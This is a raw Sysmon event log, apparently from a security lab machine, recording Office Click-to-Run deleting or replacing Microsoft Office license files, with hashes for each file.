14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ppd.xrm-msMD5=D4662C74D325FBA1D9849C651E35F792,SHA256=D0B9ACD0741CBE1A698A1F1FB9FFCC0D45C76B774C9AB4F86C9C47AF337E4E71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalDemoR_BypassTrial180-ul-oob.xrm-msMD5=15E55DA7B331A8D1C27C859E703F5D64,SHA256=06AF31B7496A68B40499B163DB02ADD7451E92727FF11723B70B21748119E6D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalDemoR_BypassTrial180-ppd.xrm-msMD5=F12C7519E8D5A0CA5A26568BFD9ACA43,SHA256=6F7AB4E36697A269FB0A51BFA4CC251578A9531E04EE90E0BAC19E1BBD03E414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Trial-ul-oob.xrm-msMD5=CEF2ACCB0D3E0C68D7926687CEF6D3D3,SHA256=F7C97170C0EB465BD190ABC4EA152AD1FC37F1B4F67B925546EA9D5F788F00DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Trial-ppd.xrm-msMD5=86A717E033834C835E70390EACF4DCD2,SHA256=BCACEC469E074B11E1321784C4CF44C3084F8F5C55BFEBDB80B01E7BE1B9AB58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Trial-pl.xrm-msMD5=AC71390CC3AFF48A6B7DF076EF808478,SHA256=DF239C13CD838D6C979A17A0A472D4D83CF85E4EE77D35264357C6E25C669C8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Retail-ul-phn.xrm-msMD5=2C1BB203A9FA5EB04752C733A4561506,SHA256=9E1F0016E413CE2FC2170D71DAF2FD685220823A9B4A9EA84B11E88A8FF5C250,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Retail-ul-oob.xrm-msMD5=6389C01870CF0F0DA7D28D7884342845,SHA256=60638B8AC04EBE72CDF8E561EED389938625E6CE7F313A7CBA21AA9A69FDD68C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Retail-ppd.xrm-msMD5=0916A8C1A5B3BF0E801B2A34BD1FCEDF,SHA256=153C976E784ADA74A56C3962439B5D62F39B7034D931796D638F1ED851E2F1A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Retail-pl.xrm-msMD5=6CC8E2C75ED7AE404AFE83CAB929C9A7,SHA256=E9FE16978B904172909A261F533D3B4DD59696A643A976A59A83A3CC1AF773B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_OEM_Perp-ul-phn.xrm-msMD5=CCD01B6F79CE4A996EEAE7E16570D12D,SHA256=6450682A272A537C716948D1BC700D7B6A200E0302AB48C923D33BDD5D687FF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_OEM_Perp-ul-oob.xrm-msMD5=04F09DAD6E5114BF0F71169893CF2695,SHA256=2B81E76FA2B197BD7789ED874A7640AB489E8C9EA67DB500EEB59751E997BBA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_OEM_Perp-ppd.xrm-msMD5=7600032184964A071B52A8090D177BBA,SHA256=15A9F129743196CC389776014C845E64A9FA915D33A236D9F83E1003A26CA331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_OEM_Perp-pl.xrm-msMD5=381CD2DD6346C00D306B9BD476822A95,SHA256=FC1A010E2C06380F11EB3DBE397D1609309DEA56CD4269CE7BED07273CE26F6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Grace-ul-oob.xrm-msMD5=501A9B5957CBE16896038DFF2FA10A60,SHA256=69B310B6BC5BE5EB13CDDF6083AB661264DDE52B562E3EFA66E07CE93F74E2C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019R_Grace-ppd.xrm-msMD5=3AFCE5504268B12791FE0BD5F026D8E7,SHA256=845F0DA564ED28AB5E3C802CEF80874E934B9081DBF66AE4C5A1142B6F328789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019DemoR_BypassTrial180-ul-oob.xrm-msMD5=BF391E85A2B32B75EA9356E2BB8DDFBB,SHA256=DA8C945248C3A87B311EDD6380E1AF6AD7C8598498BB14551F8D2ED6F820AAEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Personal2019DemoR_BypassTrial180-ppd.xrm-msMD5=2BAA60A5AB8FDA4F84090D32DB48D4A9,SHA256=5651F02398D3B64E57140D19139DE9ABFBBA92D15F320ED05AD88693CC663A66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookVL_MAK-ul-phn.xrm-msMD5=6230D48F1E2509057DF6DDB192A2E6E5,SHA256=03507CAC3786AC933FCF4F8A6541FF0A48B96BC62C0952C8836BC57BF5788205,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookVL_MAK-ul-oob.xrm-msMD5=CEC8DA73574386AD33AD06A0B8E4E728,SHA256=7609502A40DBE1AC9315F1867095CB9DDEF5F1809E65D8E4B6C745F6C54D8297,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookVL_MAK-ppd.xrm-msMD5=409520A2CCB480E131767FA0D8581091,SHA256=C3A312F2034878F2FB5269FF8AA2E1CFAFCF89705119D5094C044DB88BF6F623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookVL_MAK-pl.xrm-msMD5=C9CC0AC1B0DD27D098763C1598C06019,SHA256=CB117CD77C32756B94C802AA55D24D10346BA66E8C375D3E5200B24B32B6F8A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookVL_KMS_Client-ul.xrm-msMD5=3B4F82ACBB005F3C3B71AB8406673E0C,SHA256=894C2FB736D81598110490BA7F3678F51C5FC3D499A14E60E4B92AFC7C010742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookVL_KMS_Client-ul-oob.xrm-msMD5=05FF23A6850BAF5410E258C7096BF4FC,SHA256=19AD38F2DAD301D911D15BF7F2C9F57D23E1EC2F2C0FACE8D9C331C59C81295D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookVL_KMS_Client-ppd.xrm-msMD5=A2683EF819623119E155DB54FF5C9B54,SHA256=C15DC307CE8DAB4408CA9B26B5E99D16260211EAA71C2B59166BB01B03CF6C99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Trial-ul-oob.xrm-msMD5=B4DCAA5FB7DCAE9962F892825ACADA3F,SHA256=358C37214CBF4A254FD670F8CBC402E5238E2201D34C6DF633150BF3337ED0DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Trial-ppd.xrm-msMD5=1516C9B568CB3C273EFE18816DD0A72F,SHA256=FE310B354B2C2BF216C1A8564678BB1FC06D61DB288248794744FC2EECAECD28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Trial-pl.xrm-msMD5=3F028FC05A02B68854D55DEC72E0175F,SHA256=1D2E7F90198480364812C94BA6D8717794CC4FE35E19E12D51D699D30B783186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Retail-ul-phn.xrm-msMD5=BB790E2E7D6D6AC8FC6C0BB4AF11DB5D,SHA256=5F8A4F283CCE904507009C67DBDD02F990F80931F5633EA34DA891F3A9AB65FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Retail-ul-oob.xrm-msMD5=CB578E4EB173D810C08D12B83B945048,SHA256=B86F5E2621286F878A0DE59F773625A92BC72FF3E5335AFF955DA26BA1D44B48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Retail-ppd.xrm-msMD5=0A8A405C67AB9401FCA65525903E15B8,SHA256=21B52A88530B02C63EB41503C64784BEF3E9B929ED57A1E685D2C1751E343A9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Retail-pl.xrm-msMD5=A7B3313A4459D78CF3BB98B8A645709A,SHA256=075C74F886BF90D14F031A5D14632779EC40F4F5C24E83D78EBD47A4DD877D80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_OEM_Perp-ul-phn.xrm-msMD5=EADF394F50D64447362D21CE02AAB0FC,SHA256=6A22D967458E7C1A13E941184C7BAD133A885A2EEEFC669EC0F7CCEC01CB7030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_OEM_Perp-ul-oob.xrm-msMD5=5C3DD3E4D42C8C270AAEC229B9CE060D,SHA256=F2A822ACE52884512845A22119DC82F7AB82FC871D54BAD8D1F9B31E0D0C890D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_OEM_Perp-ppd.xrm-msMD5=0EC3E53B454987E93B7A105ECBD50C2C,SHA256=05970EA96C2BD8142D9A963FE0F370AA0CC6A55EECBF8D7C3DEF062C4EBC65EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_OEM_Perp-pl.xrm-msMD5=F8C967CD2C6786076F09672DF8778FCC,SHA256=878265E35D0C5D5C20184DDD87A4DB5318FD907FE01A0CED4EECF1F42835306C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Grace-ul-oob.xrm-msMD5=0F0B4433D6DE95F66EDA0F4D051BA6FE,SHA256=47726C9A5A468144B40A20908D67D77C9BE90800BD8FE1CD441BC1C10C5324C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\OutlookR_Grace-ppd.xrm-msMD5=E6F3F29631A5E0DE34B71109C79BE6AE,SHA256=BA13405BDB9611F16AEAFC790E499E47A7B5888563D6B49DD576A2E35BBBEBFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-msMD5=98F908CB79644885D600B09C8BEB6818,SHA256=84C69B206E8E8C79E9075A9BE54831873F34712000328850AA7D610AAABC76F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019VL_MAK_AE-ul-oob.xrm-msMD5=60201413E25C84B3C56BFFEC12AF4EA9,SHA256=D54C72C54164A849CBBC6C7AA82E5126694E5E8AB1E21701C7C2D5630D20C618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019VL_MAK_AE-ppd.xrm-msMD5=DDEFE285A440DB680F353F54552171F3,SHA256=4E5FB1284B627432351B084C999929634E3414E5C781D5D20A906EDD793F6597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019VL_MAK_AE-pl.xrm-msMD5=8850254ABD631B366FFB77BEAEF8C5DA,SHA256=AC3DF288FA658E691C2C4631ECA0A5F4B2D10349A9460A7DF33B6E002D22F618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul.xrm-msMD5=F560164B2F4E0E6E981F863EA0B19094,SHA256=C9FB7715A8790D39597E45FC0B7A285278E8EC15EA77989B9F8F593F8060101D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=4D48477EEA5BC9535827F1D66C419D98,SHA256=278DE03F7D31232C11807292C2965362EF6B77B58F727D47DDDECE748189D74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 